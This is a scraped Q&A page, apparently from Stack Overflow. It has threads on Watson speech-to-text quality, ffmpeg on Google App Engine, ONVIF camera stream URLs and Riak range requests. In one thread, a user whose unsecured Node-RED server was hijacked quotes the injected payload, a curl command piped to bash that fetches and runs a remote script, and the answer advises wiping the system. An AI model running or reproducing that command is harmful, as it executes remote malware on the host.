Terrible Watson transcription - ibm-watson

I'm trying to use Watson to create the transcription of an audio file in brasilian portuguese. I made the call to the api and the result returned successfully. But the transcription is beyond terrible. It's absolutely useless, with no word being recognized correctly.
I used the following command:
curl -X POST -u "apikey:<key>" --header "Content-Type: audio/mp3" --data-binary #./file.mp3
"https://api.us-south.speech-to-text.watson.cloud.ibm.com/instances/<code>/v1/recognize/model=pt-BR_BroadbandModel"
The test audio consists in a 9 min part of a 90 mins audio. It's an interview of a resercher with a dockworker. It has been recorded with a cel phone. I have upload it here, for examination: https://drive.google.com/file/d/1Xuibxksudp55uwaz6oSOccTZ3pP7Dya9/view?usp=sharing
It's not possible that Watson has a so terrible transcription. What am I missing ? do I have to set some parameter or do some work in the audio first ?
I tried the narrowband model also. Tried flac also.

the watson ibm api seems not to be properly codd for end users, the reasons seem their api design is overcomplicated for transcriptions.
it has a bug I believe their team has not been able to decode
It is however advisable to work with google
and speechRecognition
pip install --upgrade SpeechRecognition(linux, unix systems)
or C:\path_to_ python.exe -m pip install --upgrade SpeechRecognition (windows)
this is one module that has all the built in
capacity for the different api creators such as ibm
google, microsoft etc,
just by using
import speech_recogntion as sr
r = sr.Recognizer()
with sr.AudioFile("path to audio file") as source:
#r.adjust_for_ambient_noise() depending on if you have background noise
audio = r.record(source)
then ;
recognize the file out put
where xxx is the api creator from a list. say
google, ibm, azure or bing(with microsoft)
t = r.recognize_xxx(audio, credentials, ...)
read up more on the module to be more precise
this is only a rough guide

Related

ffmpeg won't execute properly in google app engine standard nodejs

I have tried for three full days to get GAE (standard - nodejs) to run a simple video transcoder from MOV to MP4 using ffmpeg. I have tried using ffluent-ffmpeg, kicking off a child process (e.g. spawn), and nothing works. As soon as it hits the call to the executable it always errors. I have confirmed ffmpeg is installed and even tried using ffmpeg-static. Moreover, I have it working on my local machine with no problems (using all of the aforementioned ways).
I have also tried logging the errors and nothing is really all that helpful. I can see its working through any installed package including ffmpeg (system package).
Below is the pseudo code...step three is where the problem occurs.
Send file name to GAE endpoint
Download the file from google cloud storage to a temp file
Transcode using ffmpeg
Upload temp file to google cloud storage
Remove old google cloud storage file
Remove temp file
The file I am using to test is 6MB...a 5 second video I took on my iPhone. Thank you in advance.
UPDATE: I successfully deployed the exact same code to Node Flex environment and everything works great. I wasn't able to get any errors in the standard environment that directed me where to look but my guess is it has something to do with how it stores the file I pipe into FFMPEG on GAE Node Standard. The docs say its a virtual file system that uses RAM. I'd love to hear if anybody managed to get it working in the standard environment.
After a long battle, I finally figured out what was going on. I did not have enough compute resources. If anyone out there is going to build a transcoding service for images and videos, be sure you up your cores to at least 4 out of the gate. My jobs were randomly failing (but not repeatable for processing the same files), web sockets were disconnecting and reconnecting, etc.
To the person who downgraded my question because I did not post an error (which I stated I did not really have)...well, there isn't going to necessarily be an error in the logs when your CPU starts dropping jobs because it can't keep up with the load. Like I mentioned in my question, I would get errors but nothing meaningful.
You're right, ffmpeg is listed in the pre-installed packages for the Node.js Runtime.
However they don't mention which ffmpeg version is installed.
I looked into the fluent-ffmeg prerequisites and it requires ffmpeg >= 0.9 to work.
Try to update your ffmpeg version running the command:
apt-get update ffmpeg
in your instance's console. Tell us how it goes.
const outFile = bucket.file(`${storagePath}`)
//create a referance to your storage bucket path
const outStream = outFile.createWriteStream()
You can always put a on 'stderr' listener to your ffmpeg command.
I had similar problems transcoding on google app engine so fluent ffmpeg stderr listener helped me a lot debugging it.
ffmpeg.addInput(`tmp/${app_engine_filepath})
.format('mp3')
.on('stderr', function(stderrLine) {
console.log('Stderr output: ' + stderrLine);
})
.on('error, (error) => {
console.log(error)
})
.pipe(outStream)
.on('end', () => {
fs.remove(`tmp/${app_engine_filepath}`)
})
You might also want to check your ffmpeg version on standart environment. (that should also be viewable through stderrlogs)

How to start the actual "Speech to text"?

I am a freelancing author and have gathered tons of hours of interview material which needs to be transcribed.
While browsing the Internet I came across IBM Watson "Speech to text" which should be the ideal solution to handle that huge amount of spoken word.
After registration I am struggling with even opening it. Since I am not very much equipped with programming, etc.
Can someone provide an example with steps that I can follow to achieve my task?
which platform you want to use Speech to text service on it ?
If you are not a coder, then the best starting point for you will be Node-RED. Take a look at this tutorial that creates a translator - https://developer.ibm.com/tutorials/build-universal-translator-nodered-watson-ai-services/?cm_mmc=IBMDev--Digest--ENews2019-_-email&spMailingID=39408813&spUserID=MzYzODEwODAwNzk4S0&spJobID=1500992192&spReportId=MTUwMDk5MjE5MgS2
If uses Speech to Text, Translation, and Text to Speech. You will only need the Speech to Text bit. Once you get it working with a microphone you can make use of the file inject to push your own audio files through the service.
For larger files you will need to make use of http post and multi-parts, when you get to that point, raise a new question, tag it with node-red and someone will post a sample flow for you.
You do not need to have any programming knowledge to use Watson Speech To Text. You can just send your files to the service using the curl tool. Which you can easily install in your computer, it is free.
Then you can send a file to the service running the following command:
curl -X POST -u "apikey:{apikey}" --header "Content-Type: audio/flac" --data-binary #audio-file2.flac "https://stream.watsonplatform.net/speech-to-text/api/v1/recognize"
You just need an apikey to run that command, which you can get following these steps: https://cloud.ibm.com/docs/services/watson?topic=watson-iam
Then just replace the .flac file in that command by the file you want to process. And pass the right value for the Content-Type: header. For Flac files it is audio/flac, for other audio formats you have the list here: https://cloud.ibm.com/apidocs/speech-to-text

Remove Multiple Node-Red Flows - Raspberry Pi LAMP Hack

I have a raspberry pi LAMP server which I use as a hobby. I also have Node-Red installed which I use for ESp8266 Sensors.
I looked at Node-Red today and there are possibly 40 - 50 flows added (which I did not create). They are all the same timestamp, feeding to message payload. The payload is
curl -s http://192.99.142.248:8220/mr.sh | bash -sh
The same as is reported here:
SolrException: Error loading class 'solr.RunExecutableListener' + '/var/tmp/sustes' process
Does anyone know how I can delete all flows? Can I delete and clean install Node-Red? I don't have anything on the RPi which I need to keep. Thanks.
Please refer to this post on the Node-RED forum: https://discourse.nodered.org/t/malware-infecting-unsecured-node-red-servers/3460
This comes as a result of exposing Node-RED to the internet without applying any security.
Your safest course of action is to wipe the SD card and start with a clean system.
Make sure you enable security this time - details in the post linked above.

Retrieve network camera stream URL in Linux

I am trying to retrieve rtsp URLs of cameras on my network. I can do this using Onvif Device Manager on Windows but how to do this on Linux using C/C++ or command line tool. I have tried various libs e.g. onvifc (OpenCVR) and onvifcpplib but none of them could compile on Linux, neither they have API documentation. Any suggestions please!
I was able to find a gsoap-onvif solution from https://github.com/tonyhu/gsoap-onvif. This programs successfully retrieves parameters from most of the Onvif complaint cameras.
you can have a try with python onvif, some feature you can use, may be other feature such as PTZ you can use .
also, you can have a try with opencvr's another project, https://github.com/veyesys/h5stream, if you can't compile,you can download from sourceforge.
Good luck.

How to configure Riak 1.3.* with range request (Accept-Ranges: bytes)

I'm trying to use riak for storing of video contents. I'm allready able to push my video to riak with the correct mite type and I also receive the Video by its URL.
The riak page tells me, that riak in version 1.3.* is capable of supporting range requests.
But curl -I MYRIAKVIDEOURL doesn't return the Accept-Ranges: bytes HTML Header (like my apache is doing. Also when trying to make a reange request by VLC (by seeking to the middle of the Video), it seems, there is no range request initiated, as loading takes long and network shows a lot of downloaded traffic. When doing the same with the Video URL offered by my apache server (tried on the same machine), range request are working well within VLC.
Anyone any Idea on how to achieve this on riak (running on Debian 7, compiled from source, tried also with Ubuntu 12.04)? Am I able to manipulate the HTTP Headers, riak will send?
thanks for the help
Do you intend to use Riak? I think Riak CS is suitable for storage of video files.
Riak CS support Range header for GET Object request.
Sample request by s3curl is like:
s3curl.pl -- -v -x localhost:8080 -H 'Range: bytes=1000-2000' \
http://yourbuckethere.s3.amazonaws.com/your/file/here

Resources